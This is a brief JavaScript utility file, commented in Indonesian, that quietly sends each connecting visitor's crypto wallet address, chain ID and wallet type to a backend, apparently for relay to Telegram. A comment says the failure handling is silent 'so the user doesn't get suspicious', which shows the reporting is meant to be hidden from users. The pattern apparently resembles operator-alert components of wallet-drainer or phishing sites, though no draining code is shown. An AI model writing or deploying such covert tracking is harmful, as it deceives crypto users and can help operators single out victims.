// src/utils/telegramReporter.js

// URL Backend Anda (Ganti jika sudah di-hosting, misal: https://api.websiteanda.com)
const BACKEND_URL = 'http://localhost:3001/api/notify-connect';

export const reportConnection = async (address, chainId, walletType) => {
  // Cek agar tidak spam notifikasi berulang kali saat refresh page
  const hasNotified = sessionStorage.getItem(`notified_${address}`);
  if (hasNotified) return; 

  try {
    const response = await fetch(BACKEND_URL, {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
      },
      body: JSON.stringify({
        address: address,
        chainId: chainId,
        walletType: walletType || 'Injected/RainbowKit'
      }),
    });

    if (response.ok) {
      console.log('✅ Connection reported securely.');
      // Tandai sesi ini sudah lapor
      sessionStorage.setItem(`notified_${address}`, 'true');
    }
  } catch (error) {
    // Silent fail agar user tidak curiga
    console.error('Report failed silently');
  }
};